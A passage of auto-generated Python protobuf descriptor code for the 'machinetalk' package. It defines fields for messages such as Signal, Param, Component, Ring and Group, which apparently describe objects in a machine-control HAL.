_descriptor.FieldDescriptor(
name='flags', full_name='machinetalk.Pin.flags', index=12,
number=13, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\300\005')),
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=668,
serialized_end=938,
)
_SIGNAL = _descriptor.Descriptor(
name='Signal',
full_name='machinetalk.Signal',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='machinetalk.Signal.type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=1,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='name', full_name='machinetalk.Signal.name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='handle', full_name='machinetalk.Signal.handle', index=2,
number=3, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='halbit', full_name='machinetalk.Signal.halbit', index=3,
number=5, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='halfloat', full_name='machinetalk.Signal.halfloat', index=4,
number=6, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='hals32', full_name='machinetalk.Signal.hals32', index=5,
number=7, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='halu32', full_name='machinetalk.Signal.halu32', index=6,
number=8, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='strval', full_name='machinetalk.Signal.strval', index=7,
number=9, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='blob', full_name='machinetalk.Signal.blob', index=8,
number=10, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='readers', full_name='machinetalk.Signal.readers', index=9,
number=11, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='writers', full_name='machinetalk.Signal.writers', index=10,
number=12, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='bidirs', full_name='machinetalk.Signal.bidirs', index=11,
number=13, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\301\005')),
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=941,
serialized_end=1171,
)
_PARAM = _descriptor.Descriptor(
name='Param',
full_name='machinetalk.Param',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='machinetalk.Param.type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=1,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='name', full_name='machinetalk.Param.name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='handle', full_name='machinetalk.Param.handle', index=2,
number=3, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='halbit', full_name='machinetalk.Param.halbit', index=3,
number=5, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='halfloat', full_name='machinetalk.Param.halfloat', index=4,
number=6, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='hals32', full_name='machinetalk.Param.hals32', index=5,
number=7, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='halu32', full_name='machinetalk.Param.halu32', index=6,
number=8, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='strval', full_name='machinetalk.Param.strval', index=7,
number=9, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='blob', full_name='machinetalk.Param.blob', index=8,
number=10, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='dir', full_name='machinetalk.Param.dir', index=9,
number=11, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=64,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='oldname', full_name='machinetalk.Param.oldname', index=10,
number=12, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='owner', full_name='machinetalk.Param.owner', index=11,
number=13, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='runtime', full_name='machinetalk.Param.runtime', index=12,
number=14, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='maytime', full_name='machinetalk.Param.maytime', index=13,
number=15, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\302\005')),
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=1174,
serialized_end=1464,
)
_FUNCTION = _descriptor.Descriptor(
name='Function',
full_name='machinetalk.Function',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='machinetalk.Function.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='handle', full_name='machinetalk.Function.handle', index=1,
number=2, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='owner_id', full_name='machinetalk.Function.owner_id', index=2,
number=3, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='users', full_name='machinetalk.Function.users', index=3,
number=4, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='runtime', full_name='machinetalk.Function.runtime', index=4,
number=5, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='maxtime', full_name='machinetalk.Function.maxtime', index=5,
number=6, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='reentrant', full_name='machinetalk.Function.reentrant', index=6,
number=7, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='type', full_name='machinetalk.Function.type', index=7,
number=8, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='maxtime_increased', full_name='machinetalk.Function.maxtime_increased', index=8,
number=9, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\303\005')),
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=1467,
serialized_end=1669,
)
_THREAD = _descriptor.Descriptor(
name='Thread',
full_name='machinetalk.Thread',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='machinetalk.Thread.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='handle', full_name='machinetalk.Thread.handle', index=1,
number=2, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='uses_fp', full_name='machinetalk.Thread.uses_fp', index=2,
number=3, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='period', full_name='machinetalk.Thread.period', index=3,
number=4, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='priority', full_name='machinetalk.Thread.priority', index=4,
number=5, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='task_id', full_name='machinetalk.Thread.task_id', index=5,
number=6, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='cpu_id', full_name='machinetalk.Thread.cpu_id', index=6,
number=7, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='function', full_name='machinetalk.Thread.function', index=7,
number=8, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\304\005')),
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=1672,
serialized_end=1820,
)
_COMPONENT = _descriptor.Descriptor(
name='Component',
full_name='machinetalk.Component',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='machinetalk.Component.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='ninst', full_name='machinetalk.Component.ninst', index=1,
number=2, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='comp_id', full_name='machinetalk.Component.comp_id', index=2,
number=4, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='type', full_name='machinetalk.Component.type', index=3,
number=5, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='state', full_name='machinetalk.Component.state', index=4,
number=6, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='last_update', full_name='machinetalk.Component.last_update', index=5,
number=7, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='last_bound', full_name='machinetalk.Component.last_bound', index=6,
number=8, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='last_unbound', full_name='machinetalk.Component.last_unbound', index=7,
number=9, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='pid', full_name='machinetalk.Component.pid', index=8,
number=10, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='args', full_name='machinetalk.Component.args', index=9,
number=11, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='timer', full_name='machinetalk.Component.timer', index=10,
number=12, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='userarg1', full_name='machinetalk.Component.userarg1', index=11,
number=14, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='userarg2', full_name='machinetalk.Component.userarg2', index=12,
number=15, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='pin', full_name='machinetalk.Component.pin', index=13,
number=16, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='param', full_name='machinetalk.Component.param', index=14,
number=17, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='funct', full_name='machinetalk.Component.funct', index=15,
number=19, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='no_create', full_name='machinetalk.Component.no_create', index=16,
number=18, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\305\005')),
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=1823,
serialized_end=2181,
)
_RING = _descriptor.Descriptor(
name='Ring',
full_name='machinetalk.Ring',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='machinetalk.Ring.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='handle', full_name='machinetalk.Ring.handle', index=1,
number=2, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='owner', full_name='machinetalk.Ring.owner', index=2,
number=3, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='stream', full_name='machinetalk.Ring.stream', index=3,
number=4, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='wmutex', full_name='machinetalk.Ring.wmutex', index=4,
number=5, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='rmutex', full_name='machinetalk.Ring.rmutex', index=5,
number=6, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='rtapi_shm', full_name='machinetalk.Ring.rtapi_shm', index=6,
number=7, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='reader', full_name='machinetalk.Ring.reader', index=7,
number=8, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='writer', full_name='machinetalk.Ring.writer', index=8,
number=9, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='total_size', full_name='machinetalk.Ring.total_size', index=9,
number=10, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='scratchpad', full_name='machinetalk.Ring.scratchpad', index=10,
number=11, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='ring_shmkey', full_name='machinetalk.Ring.ring_shmkey', index=11,
number=12, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='encodings', full_name='machinetalk.Ring.encodings', index=12,
number=13, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\306\005')),
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=2184,
serialized_end=2422,
)
_MEMBER = _descriptor.Descriptor(
name='Member',
full_name='machinetalk.Member',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='mtype', full_name='machinetalk.Member.mtype', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='userarg1', full_name='machinetalk.Member.userarg1', index=1,
number=2, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='epsilon', full_name='machinetalk.Member.epsilon', index=2,
number=3, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='signal', full_name='machinetalk.Member.signal', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='groupname', full_name='machinetalk.Member.groupname', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='handle', full_name='machinetalk.Member.handle', index=5,
number=6, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='pin', full_name='machinetalk.Member.pin', index=6,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='param', full_name='machinetalk.Member.param', index=7,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\307\005')),
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=2425,
serialized_end=2654,
)
_GROUP = _descriptor.Descriptor(
name='Group',
full_name='machinetalk.Group',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='machinetalk.Group.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='handle', full_name='machinetalk.Group.handle', index=1,
number=2, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='userarg1', full_name='machinetalk.Group.userarg1', index=2,
number=4, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='userarg2', full_name='machinetalk.Group.userarg2', index=3,
number=5, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='refcount', full_name='machinetalk.Group.refcount', index=4,
number=6, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='member', full_name='machinetalk.Group.member', index=5,
number=7, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\310\005')),
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=2657,
serialized_end=2793,
)
_PROTOCOLPARAMETERS = _descriptor.Descriptor(
name='ProtocolParameters',
full_name='machinetalk.ProtocolParameters',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='keepalive_timer', full_name='machinetalk.ProtocolParameters.keepalive_timer', index=0,
number=1, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='group_timer', full_name='machinetalk.ProtocolParameters.group_timer', index=1,
number=2, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='rcomp_timer', full_name='machinetalk.ProtocolParameters.rcomp_timer', index=2,
number=3, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\311\005')),
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=2795,
serialized_end=2890,
)
_VTABLE = _descriptor.Descriptor(
name='Vtable',
full_name='machinetalk.Vtable',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='machinetalk.Vtable.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='handle', full_name='machinetalk.Vtable.handle', index=1,
number=2, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='owner_id', full_name='machinetalk.Vtable.owner_id', index=2,
number=3, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='context', full_name='machinetalk.Vtable.context', index=3,
number=5, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='refcount', full_name='machinetalk.Vtable.refcount', index=4,
number=6, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='version', full_name='machinetalk.Vtable.version', index=5,
number=7, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='vtable', full_name='machinetalk.Vtable.vtable', index=6,
number=8, type=6, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\312\005')),
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=2893,
serialized_end=3025,
)
_INST = _descriptor.Descriptor(
name='Inst',
full_name='machinetalk.Inst',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='machinetalk.Inst.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='comp_id', full_name='machinetalk.Inst.comp_id', index=1,
number=2, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='inst_id', full_name='machinetalk.Inst.inst_id', index=2,
number=3, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='inst_size', full_name='machinetalk.Inst.inst_size', index=3,
number=4, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='vtable', full_name='machinetalk.Inst.vtable', index=4,
number=5, type=6, cpp_type=4, label=1,
